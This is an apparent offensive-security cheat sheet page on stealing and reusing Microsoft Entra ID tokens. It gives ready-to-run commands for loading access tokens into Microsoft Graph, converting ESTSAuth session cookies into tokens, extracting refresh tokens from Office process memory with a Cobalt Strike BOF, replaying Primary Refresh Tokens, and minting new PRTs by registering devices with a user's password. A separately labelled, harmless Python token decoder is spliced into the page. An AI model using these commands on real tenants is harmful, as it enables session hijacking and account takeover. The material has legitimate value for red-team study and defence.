InternalAllTheThings/docs/cloud/azure/azure-access-and-token.md


Microsoft Entra ID / Azure Active Directory

Access Token

Decode access tokens: jwt.ms
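As an added example (not part of the original cheat sheet), the decoding that jwt.ms performs can be done offline in Python to review the claims that matter when triaging a token: audience, scopes, authentication methods and expiry. The sample token is constructed and unsigned, and the function names are assumptions; no signature verification is performed.

```python
import base64
import json
import time

# Claims worth reviewing in an Entra ID access token (v1 and v2 names).
CLAIMS = ("aud", "iss", "tid", "appid", "azp", "upn", "oid", "scp", "roles", "amr", "deviceid")

def _b64url_json(segment):
    """Decode one base64url JWT segment (padding restored) into a dict."""
    padded = segment + "=" * (-len(segment) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))

def decode_access_token(token, now=None):
    """Return header fields, selected claims and expiry. No signature check."""
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    header, payload = _b64url_json(parts[0]), _b64url_json(parts[1])
    now = time.time() if now is None else now
    exp = payload.get("exp", 0)
    return {
        "alg": header.get("alg"),
        "kid": header.get("kid"),
        "claims": {k: payload[k] for k in CLAIMS if k in payload},
        "scopes": payload.get("scp", "").split(),
        "expired": now >= exp,
        "seconds_left": int(exp - now),
    }

def _make_sample(payload):
    """Build a constructed, unsigned sample token for the demo."""
    def enc(d):
        return base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b"=").decode()
    header = {"typ": "JWT", "alg": "RS256", "kid": "sample-kid"}
    return f"{enc(header)}.{enc(payload)}.c2ln"

# Constructed sample payload; every identifier is a placeholder.
SAMPLE = _make_sample({
    "aud": "https://graph.microsoft.com",
    "tid": "00000000-0000-0000-0000-000000000000",
    "upn": "user.lastname@domain.local",
    "scp": "User.Read Mail.Read",
    "amr": ["pwd", "mfa"],
    "iat": 1700000000, "exp": 1700003600,
})

if __name__ == "__main__":
    print(json.dumps(decode_access_token(SAMPLE), indent=2))
```
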

  • Use token
    # use the jwt
    $token = "eyJ0eXAiO..."
    $secure = $token | ConvertTo-SecureString -AsPlainText -Force
    Connect-MgGraph -AccessToken $secure
    
    # whoami
    Get-MgContext
    Disconnect-MgGraph
    

Refresh Token

  • Requesting a token using credentials
    TODO
    

ESTSAuthPersistent is only useful when a Conditional Access (CA) policy actually grants a persistent session. Otherwise, you should use ESTSAuth.

TokenTacticsV2> Get-AzureTokenFromESTSCookie -ESTSAuthCookie "0.AS8"
TokenTacticsV2> Get-AzureTokenFromESTSCookie -Client MSTeams -ESTSAuthCookie "0.AbcAp.."

Get a Refresh Token from Office process

load bofloader
execute_bof /opt/CS-Remote-OPs-BOF/Remote/office_tokens/office_tokens.x64.o --format-string i 7324

Primary Refresh Token

  • Use PRT token
    roadtx browserprtauth --prt roadtx.prt -url http://www.office.com
    

Extract PRT on Device with TPM

  • No method known to date.

Generate a PRT by registering a device

roadtx interactiveauth -u user.lastname@domain.local -p password123 -r devicereg
roadtx device -n devicename
roadtx prt -u user.lastname@domain.local -p password123 --key-pem devicename.key --cert-pem devicename.pem
roadtx prtenrich --prt roadtx.prt
roadtx prt -u user.lastname@domain.local -p password123 --key-pem devicename.key --cert-pem devicename.pem -r 0.AVAApQL<snip>
